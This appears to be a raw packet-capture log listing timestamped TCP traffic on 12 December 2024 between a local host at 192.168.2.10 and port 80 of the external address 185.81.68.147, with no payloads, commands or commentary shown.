                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.311893940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.312706947 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.312751055 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.312870026 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.313705921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.313750029 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.313944101 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.314724922 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.314771891 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.314802885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.315696955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.315738916 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.315809965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.316715956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.316756964 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.316823959 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.317732096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.317773104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.317831039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.318859100 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.318902969 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.319104910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.459136009 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.459239960 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.459422112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.459538937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.459553003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.459590912 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.460552931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.460601091 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.460633993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.461431026 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.461477995 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.461549044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.462440014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.462488890 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.462562084 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.463459969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.463512897 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.463553905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.464570999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.464647055 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.464667082 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.465509892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.465562105 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.465831041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.466545105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.466594934 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.466648102 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.467566967 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.467607975 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.467612028 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.468537092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.468585014 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.468710899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.469662905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.469711065 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.469775915 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.470588923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.470638037 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.470664978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.471584082 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.471632004 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.471659899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.472578049 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.472625971 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.472672939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.473596096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.473642111 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.473686934 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.474623919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.474672079 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.474729061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.475668907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.475722075 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.475765944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.476651907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.476699114 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.476830006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.477646112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.477686882 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.477694988 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.478748083 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.478809118 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.478816986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.479718924 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.479800940 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.479814053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.480709076 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.480767012 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.480815887 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.481755018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.481805086 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.481862068 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.482747078 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.482796907 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.482841015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.483752012 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.483799934 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.483828068 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.484762907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.484808922 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.484833002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.485815048 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.485858917 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.485938072 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.486809969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.486857891 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.486974955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.487812042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.487867117 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.487895012 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.488831997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.488881111 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.489046097 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.489860058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.489933014 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.489945889 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.490864992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.490933895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.490933895 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.491869926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.491957903 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.491960049 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.492892981 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.492945910 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.493000031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.493956089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.494014025 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.494041920 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.494910955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.494965076 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.495008945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.495996952 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.496071100 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.496182919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.496998072 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.497045040 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.497072935 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.497981071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.498028994 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.498078108 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.498970032 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.499007940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.499016047 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.500001907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.500051022 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.500097990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.501044035 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.501091957 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.501168966 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.502083063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.502094030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.502127886 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.503032923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.503082037 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.503134012 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.504075050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.504125118 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.504167080 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.505059004 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.505105972 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.505130053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.506151915 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.506196976 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.506277084 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.507117987 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.507168055 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.507239103 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.508119106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.508177996 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.508399963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.509119034 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.509166956 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.509222031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.510158062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.510216951 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.510221004 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.511168003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.511217117 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.511271954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.512125969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.512182951 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.651283979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.651344061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.651637077 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.651731968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.651837111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.651890039 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.652765989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.652952909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.653017044 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.653826952 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.653949976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.654006958 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.654886007 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.654980898 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.655039072 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.655812025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.655841112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.655893087 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.656793118 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.656945944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.657001019 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.657814026 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.657931089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.657984018 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.658900976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.659020901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.659074068 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.659884930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.660069942 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.660126925 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.660878897 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.661010981 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.661068916 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.661955118 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.662061930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.662120104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.662933111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.663012028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.663069010 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.663945913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.664093018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.664155960 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.664947033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.665024042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.665077925 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.665983915 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.666073084 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.666131020 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.667006016 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.667061090 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.667119980 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.667998075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.668103933 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.668169975 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.669023991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.669122934 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.669181108 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.670043945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.670180082 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.670248032 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.671015024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.671125889 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.671188116 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.672044992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.672449112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.672511101 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.673168898 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.673422098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.673491955 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.674062967 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.675133944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.675143957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.675168991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.675194025 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:49.675231934 CET4994680192.168.2.10185.81.68.147
